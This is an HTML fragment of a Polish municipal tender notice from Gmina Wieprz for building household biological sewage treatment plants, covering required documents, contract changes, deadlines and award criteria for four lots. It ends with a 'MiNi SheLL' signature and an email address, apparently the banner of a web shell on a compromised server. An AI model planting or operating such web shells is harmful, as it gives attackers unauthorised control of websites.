<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)Oświadczenie o zastosowaniu oczyszczalni ścieków legitymujących się dokumentem potwierdzającym zgodność z normą PN-EN 12566-3+A2:2013 wydanym przez laboratorium notyfikowane przez Komisję Europejską- załącznik Nr 10 ;
2)Wydaną przez producenta Deklarację Właściwości Użytkowych dla oferowanych przydomowych biologicznych oczyszczalni ścieków- Załącznik Wykonawcy; 
3)Instrukcja obsługi - Załącznik Wykonawcy;
4)Wzór oznaczenia CE dla oczyszczalni (dla wszystkich oferowanym oczyszczalni z typoszeregu) - Załącznik Wykonawcy;
5)Pełny raport badań PBOŚ, potwierdzający zgodność produktu z normą 12566-3+A2:2013, wystawiony przez laboratorium notyfikowane przez Komisję Europejską, wydawany dla konkretnego typoszeregu urządzeń (wraz z wskazaniem dobowej energochłonności  urządzenia)- Załącznik Wykonawcy;
6)Wykaz typów PBOŚ w ramach typoszeregu, dla którego sporządzono pełny raport badań PBOŚ j/w;
7)Opis w postaci DTR Producenta, rysunki, schematy,  fotografie proponowanych do zastosowania przydomowych biologicznych oczyszczalni ścieków zawierające w szczególności schemat technologii obiegu ścieków oraz opis elementów oczyszczalni- Załącznik Wykonawcy; 
8)Wykaz oczyszczalni (z zachowaniem oznaczeń nadanych przez Zamawiającego)  dla których konieczna będzie aktualizacja /zmiana projektu oraz uzyskanie  wszystkich  stosownych zezwoleń na wykonanie robót budowlanych (zadanie 1 i zadanie 3) - Załącznik Wykonawcy.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)wypełniony i podpisany formularz oferty - załączniki Nr 1A  i/lub  Nr 1B  i/lub  Nr 1C  i/lub  Nr 1D;
2)pełnomocnictwo do reprezentowania Wykonawcy lub Wykonawców w przypadku gdy: 
a)ofertę podpisuje  w imieniu Wykonawcy inna osoba;
b)ofertę składają Wykonawcy ubiegający się wspólnie o udzielenia zamówienia publicznego (np. konsorcjum) ;
3)Kosztorys ofertowy zadanie Nr 2 i zadanie Nr 3 - wymóg porządkowy.
4) Pisemne zobowiązanie innych podmiotów do oddania do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia lub inne dokumenty określające : - jaki jest zakres dostępnych Wykonawcy zasobów innego podmiotu, - w jaki sposób zostaną wykorzystane zasoby innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia, - jakiego charakteru stosunki będą łączyły Wykonawcę z innym podmiotem, - jaki jest zakres i w jakim okresie inny podmiot będzie brał udział przy wykonywaniu zamówienia - jeżeli dotyczy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy w następujących okolicznościach :
1)	konieczności wprowadzenia zmian projektowych lub technologicznych;
2)	z powodu istotnych braków lub błędów w dokumentacji projektowej, również tych polegających na   niezgodności dokumentacji z przepisami prawa;
3)	z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego;
4)	z powodu wystąpienia dodatkowych, a niemożliwych do przewidzenia przed zawarciem umowy przez    doświadczonego Wykonawcę robót;
5)	z powodu niemożliwych do przewidzenia niekorzystnych warunków atmosferycznych które mają wpływ    na realizację zamówienia publicznego;
6)	przedłużenia się uzgodnień zewnętrznych przez podmioty do tego upoważnione; 
7)	wystąpienia okoliczności nie zawinionych przez strony,  których nie można było wcześniej przewidzieć;
8)	zmian dokumentacji projektowej dokonanych na wniosek Zamawiającego (beneficjentów lub Wykonawcy);
9)	w przypadku zmiany kluczowego personelu Wykonawcy lub Zamawiającego;
10)	wystąpienia obiektywnych zmian ocenianych jako korzystne dla Zamawiającego.
Zmiany postanowień zawartej umowy będą dokonane za zgodą stron, wyłącznie w formie pisemnego aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wieprz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wieprz
ul. Centralna 5
34-122 Wieprz
pok. Nr 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.02.2016 godzina 10:00, miejsce: Urząd Gminy Wieprz
ul. Centralna 5
34-122 Wieprz
pok. Nr 10 - Dziennik Podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 109 szt. oczyszczalni- pozycje  wyszczególnione  w  załączniku do formularza  ofertowego dla zadania Nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Roboty budowlane, w rozumieniu art. 3 pkt.7) Ustawy z dnia 7 lipca 1994r. Prawo budowlane polegające na wybudowaniu  biologicznych oczyszczalni ścieków (PBOŚ) przy gospodarstwach indywidualnych  w Gminie Wieprz wg zestawienia podanego w specyfikacji .
2. PBOŚ - należy przez to rozumieć Przydomowe Biologiczne Oczyszczalnie Ścieków, w treści SIWZ zwane również w skrócie oczyszczalnią, zbiornikiem lub zespołem urządzeń. Przydomowa biologiczna oczyszczalnia ścieków (PBOŚ) to urządzenie lub zespół urządzeń, w których na drodze procesów mechanicznych, biologicznych i chemicznych następuje redukcja ładunku zanieczyszczeń w ściekach do wielkości dopuszczalnych określonych w Rozporządzeniu MŚ z dnia 18 listopada 2014r w sprawie warunków, jakie należy spełnić przy wprowadzaniu ścieków do wód lub do ziemi, oraz w sprawie substancji szczególnie szkodliwych dla środowiska wodnego (Dz.U. z dnia 16 grudnia 2014r. poz. 1800) jak dla oczyszczani poniżej 2000 RLM wg Załącznika Nr 1 do ww. aktu wykonawczego.  
3.Wykonanie prac  projektowych polegających na analizie zastosowanych w projektach rozwiązań odprowadzania oczyszczonych ścieków (powierzchni chłonnej) i w przypadku zaistnienia  konieczności,  dokonanie zmian  w  dokumentacji (dokumentacja zamienna)  wraz  ze zmianą w kontekście przepisów prawa budowlanego. Weryfikacja powierzchni na podstawie wykonanych badań geologicznych.  Zamawiający dopuszcza możliwość zastosowania równoważnych (zamiennych do widniejących w projektach) sposobów odprowadzania oczyszczonych ścieków lecz muszą  one być oparte na systemach rozsączenia w gruncie. W zakres prac projektowych wchodzi także zmiana (aktualizacja) projektu budowlanego w przypadku różnic  wynikających     z zaoferowanych urządzeń,  a urządzeń zamieszczonych w projektach. 
W szczególnych przypadkach Zamawiający dopuszcza konieczność ponowienia zgłoszenia robót budowlanych przez Wykonawcę.  
4.Dokonanie  rozruchu technologicznego każdej oczyszczalni, indywidualne  przeszkolenie  użytkowników w zakresie obsługi urządzeń i instalacji oczyszczalni,  a także  przekazanie  im instrukcji obsługi (DTR) oraz  wykonanie badań  w zakresie skuteczności oczyszczania dla 11 oczyszczalni w całym okresie gwarancyjnym dla urządzenia wg oferty (wymagane są badania oczyszczonych ścieków wykonane przez akredytowane laboratorium, lokalizacje oczyszczalni do badań wskazuje Zamawiający).
5. Uporządkowanie placu budowy do stanu pierwotnego (wywóz nadmiaru gruntu, niwelacja terenu).
6. Protokolarne przekazanie  wykonanych   oczyszczalni władającym  nieruchomościami objętymi inwestycją (wszystkie formularze należy uzgodnić z Zamawiającym). 
7. Obsługa geodezyjna inwestycji.
8. Obsługa w zakresie sporządzania badań i pomiarów przeprowadzonych przez uprawnione osoby  lub podmioty,  niezbędnych do odbioru urządzenia (instalacji)  w tym badania instalacji elektrycznej;
9. Inwentaryzacja geodezyjna -  powykonawcza obiektów (w 2 egz.) .
10. Sporządzenie  i przedłożenie  dokumentacji odbiorowej  powykonawczej  (w 2 egz.).
11. Jako oczyszczalnie Zamawiający rozumie kompletny  zespół urządzeń wraz   z infrastrukturą (zasilanie  energetyczne, sieć kanalizacyjna i inne- wg projektów)  niezbędnych  do odbioru ścieków   z budynku, oczyszczenia, odprowadzenia w określony sposób, opartych na indywidualnych przydomowych oczyszczalniach  ścieków zgodnych z indywidualnie wykonanymi   projektami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.24.21-9, 45.23.13.00-8, 45.25.21.27-4, 45.26.26.40-9, 45.11.12.00-0, 45.31.00.00-3, 45.23.11.10-9, 45.23.24.10-9, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przedłużony okres gwarancji na kompletne urządzenie - 15</li>
<li>3. Energochłonność - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> oczyszczalnia ścieków w miejscowości Nidek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Roboty budowlane, w rozumieniu art. 3 pkt.7) Ustawy z dnia 7 lipca 1994r. Prawo budowlane polegające na wybudowaniu  biologicznej oczyszczalni ścieków (PBOŚ) przy budynku użyteczności publicznej.
2.PBOŚ - należy przez to rozumieć Przydomowe Biologiczne Oczyszczalnie Ścieków, w treści SIWZ zwane również w skrócie oczyszczalnią, zbiornikiem lub zespołem urządzeń. Przydomowa biologiczna oczyszczalnia ścieków (PBOŚ) to urządzenie lub zespół urządzeń, w których na drodze procesów mechanicznych, biologicznych i chemicznych następuje redukcja ładunku zanieczyszczeń w ściekach do wielkości dopuszczalnych określonych w Rozporządzeniu MŚ z dnia 18 listopada 2014r w sprawie warunków, jakie należy spełnić przy wprowadzaniu ścieków do wód lub do ziemi, oraz w sprawie substancji szczególnie szkodliwych dla środowiska wodnego (Dz.U. z dnia 16 grudnia 2014r. poz. 1800) jak dla oczyszczani poniżej 2000 RLM wg Załącznika Nr 1 do ww. aktu wykonawczego.
3. Dokonanie  rozruchu technologicznego oczyszczalni, indywidualne  przeszkolenie  użytkowników w zakresie obsługi urządzeń i instalacji oczyszczalni,  a także  przekazanie  im instrukcji obsługi (DTR) oraz  wykonanie badań  w zakresie skuteczności oczyszczania (wymagane są badania oczyszczonych ścieków wykonane przez akredytowane laboratorium).
4.Uporządkowanie placu budowy do stanu pierwotnego (wywóz nadmiaru gruntu, niwelacja terenu).
5.Protokolarne przekazanie  wykonanych   oczyszczalni władającym  nieruchomościami objętymi inwestycją (wszystkie formularze należy uzgodnić z Zamawiającym). 
6.Obsługa geodezyjna inwestycji.
7.Obsługa w zakresie sporządzania badań i pomiarów przeprowadzonych przez uprawnione osoby  lub podmioty,  niezbędnych do odbioru urządzenia (instalacji)  w tym badania instalacji elektrycznej;
8.Inwentaryzacja geodezyjna -powykonawcza obiektów (w 2 egz.) .
9.Sporządzenie  i przedłożenie  dokumentacji odbiorowej  powykonawczej  (w 2 egz.).
10.Dla zadania Nr 2 i zadania Nr 3 dokonanie zgłoszenia rozpoczęcia i zakończenia budowy oraz  wykonanie wszystkich nakazów wynikających z posiadanych decyzji (pozwolenie na budowę oraz pozwolenie wodno prawne), odbiorów oraz decyzji w tym uzyskanie czynnego  pozwolenia na użytkowanie.
11.Jako oczyszczalnie Zamawiający rozumie kompletny  zespół urządzeń wraz   z infrastrukturą (zasilanie  energetyczne, sieć kanalizacyjna i inne- wg projektów)  niezbędnych  do odbioru ścieków   z budynku, oczyszczenia, odprowadzenia w określony sposób, opartych na indywidualnych przydomowych oczyszczalniach  ścieków zgodnych z indywidualnie wykonanymi   projektami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.24.21-9, 45.23.13.00-8, 45.25.21.27-4, 45.26.26.40-9, 45.11.12.00-0, 45.31.00.00-3, 45.23.11.10-9, 45.23.24.10-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. przedłużony okres gwarancji na kompletne urządzenie - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Oczyszczalnia ścieków w miejscowości Gierałtowice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Roboty budowlane, w rozumieniu art. 3 ust.7 Ustawy oraz ustawy z dnia 7 lipca 1994r. Prawo budowlane polegające na wybudowaniu  biologicznej oczyszczalni ścieków (PBOŚ) przy budynku użyteczności publicznej.
2.PBOŚ - należy przez to rozumieć Przydomowe Biologiczne Oczyszczalnie Ścieków, w treści SIWZ zwane również w skrócie oczyszczalnią, zbiornikiem lub zespołem urządzeń. Przydomowa biologiczna oczyszczalnia ścieków (PBOŚ) to urządzenie lub zespół urządzeń, w których na drodze procesów mechanicznych, biologicznych i chemicznych następuje redukcja ładunku zanieczyszczeń w ściekach do wielkości dopuszczalnych określonych w Rozporządzeniu MŚ z dnia 18 listopada 2014r w sprawie warunków, jakie należy spełnić przy wprowadzaniu ścieków do wód lub do ziemi, oraz w sprawie substancji szczególnie szkodliwych dla środowiska wodnego (Dz.U. z dnia 16 grudnia 2014r. poz. 1800) jak dla oczyszczani poniżej 2000 RLM wg Załącznika Nr 1 do ww. aktu wykonawczego.
3. Dokonanie  rozruchu technologicznego oczyszczalni, indywidualne  przeszkolenie  użytkowników w zakresie obsługi urządzeń i instalacji oczyszczalni,  a także  przekazanie  im instrukcji obsługi (DTR) oraz  wykonanie badań  w zakresie skuteczności oczyszczania  (wymagane są badania oczyszczonych ścieków wykonane przez akredytowane laboratorium). 
4.Uporządkowanie placu budowy do stanu pierwotnego (wywóz nadmiaru gruntu, niwelacja terenu).
5.Protokolarne przekazanie  wykonanych   oczyszczalni władającym  nieruchomościami objętymi inwestycją (wszystkie formularze należy uzgodnić z Zamawiającym). 
6.Obsługa geodezyjna inwestycji.
7.Obsługa w zakresie sporządzania badań i pomiarów przeprowadzonych przez uprawnione osoby  lub podmioty,  niezbędnych do odbioru urządzenia (instalacji)  w tym badania instalacji elektrycznej;
8.Inwentaryzacja geodezyjna -powykonawcza obiektów (w 2 egz.) .
9.Sporządzenie  i przedłożenie  dokumentacji odbiorowej  powykonawczej  (w 2 egz.).
10.Dla zadania Nr 2 i zadania Nr 3 dokonanie zgłoszenia rozpoczęcia i zakończenia budowy oraz  wykonanie wszystkich nakazów wynikających z posiadanych decyzji (pozwolenie na budowę oraz pozwolenie wodno prawne), odbiorów oraz decyzji w tym uzyskanie czynnego  pozwolenia na użytkowanie.
11.Jako oczyszczalnie Zamawiający rozumie kompletny  zespół urządzeń wraz   z infrastrukturą (zasilanie  energetyczne, sieć kanalizacyjna i inne- wg projektów)  niezbędnych  do odbioru ścieków   z budynku, oczyszczenia, odprowadzenia w określony sposób, opartych na indywidualnych przydomowych oczyszczalniach  ścieków zgodnych z indywidualnie wykonanymi   projektami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.24.21-9, 45.23.13.00-8, 45.25.21.27-4, 45.26.26.40-9, 45.11.12.00-0, 45.31.00.00-3, 45.23.11.10-9, 45.23.24.10-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. przedłużony okres gwarancji na kompletne urządzenie - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> 13 szt. oczyszczalni -  pozycje  wyszczególnione  w  załączniku do formularza  ofertowego dla zadania Nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Roboty budowlane, w rozumieniu art. 3 pkt.7) Ustawy z dnia 7 lipca 1994r. Prawo budowlane polegające na wybudowaniu  biologicznych oczyszczalni ścieków (PBOŚ) przy gospodarstwach indywidualnych  w Gminie Wieprz wg zestawienia podanego w specyfikacji .
2. PBOŚ - należy przez to rozumieć Przydomowe Biologiczne Oczyszczalnie Ścieków, w treści SIWZ zwane również w skrócie oczyszczalnią, zbiornikiem lub zespołem urządzeń. Przydomowa biologiczna oczyszczalnia ścieków (PBOŚ) to urządzenie lub zespół urządzeń, w których na drodze procesów mechanicznych, biologicznych i chemicznych następuje redukcja ładunku zanieczyszczeń w ściekach do wielkości dopuszczalnych określonych w Rozporządzeniu MŚ z dnia 18 listopada 2014r w sprawie warunków, jakie należy spełnić przy wprowadzaniu ścieków do wód lub do ziemi, oraz w sprawie substancji szczególnie szkodliwych dla środowiska wodnego (Dz.U. z dnia 16 grudnia 2014r. poz. 1800) jak dla oczyszczani poniżej 2000 RLM wg Załącznika Nr 1 do ww. aktu wykonawczego.  
3.Wykonanie prac  projektowych polegających na analizie zastosowanych w projektach rozwiązań odprowadzania oczyszczonych ścieków (powierzchni chłonnej) i w przypadku zaistnienia  konieczności,  dokonanie zmian  w  dokumentacji (dokumentacja zamienna)  wraz  ze zmianą w kontekście przepisów prawa budowlanego. Weryfikacja powierzchni na podstawie wykonanych badań geologicznych.  Zamawiający dopuszcza możliwość zastosowania równoważnych (zamiennych do widniejących w projektach) sposobów odprowadzania oczyszczonych ścieków lecz muszą  one być oparte na systemach rozsączenia w gruncie. W zakres prac projektowych wchodzi także zmiana (aktualizacja) projektu budowlanego w przypadku różnic  wynikających     z zaoferowanych urządzeń,  a urządzeń zamieszczonych w projektach. 
W szczególnych przypadkach Zamawiający dopuszcza konieczność ponowienia zgłoszenia robót budowlanych przez Wykonawcę.  
4.Dokonanie  rozruchu technologicznego każdej oczyszczalni, indywidualne  przeszkolenie  użytkowników w zakresie obsługi urządzeń i instalacji oczyszczalni,  a także  przekazanie  im instrukcji obsługi (DTR) oraz  wykonanie badań  w zakresie skuteczności oczyszczania dla 3 oczyszczalni w całym okresie gwarancyjnym dla urządzenia wg oferty (wymagane są badania oczyszczonych ścieków wykonane przez akredytowane laboratorium, lokalizacje oczyszczalni do badań wskazuje Zamawiający).
5. Uporządkowanie placu budowy do stanu pierwotnego (wywóz nadmiaru gruntu, niwelacja terenu).
6. Protokolarne przekazanie  wykonanych   oczyszczalni władającym  nieruchomościami objętymi inwestycją (wszystkie formularze należy uzgodnić z Zamawiającym). 
7. Obsługa geodezyjna inwestycji.
8. Obsługa w zakresie sporządzania badań i pomiarów przeprowadzonych przez uprawnione osoby  lub podmioty,  niezbędnych do odbioru urządzenia (instalacji)  w tym badania instalacji elektrycznej;
9. nwentaryzacja geodezyjna -  powykonawcza obiektów (w 2 egz.) .
10. Sporządzenie  i przedłożenie  dokumentacji odbiorowej  powykonawczej  (w 2 egz.).
11. Jako oczyszczalnie Zamawiający rozumie kompletny  zespół urządzeń wraz   z infrastrukturą (zasilanie  energetyczne, sieć kanalizacyjna i inne- wg projektów)  niezbędnych  do odbioru ścieków   z budynku, oczyszczenia, odprowadzenia w określony sposób, opartych na indywidualnych przydomowych oczyszczalniach  ścieków zgodnych z indywidualnie wykonanymi   projektami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.24.21-9, 45.23.13.00-8, 45.25.21.27-4, 45.26.26.40-9, 45.11.12.00-0, 45.31.00.00-3, 45.23.11.10-9, 45.23.24.10-9, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przedłużony okres gwarancji na kompletne urządzenie - 15</li>
<li>3. Energochłonność - 15</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com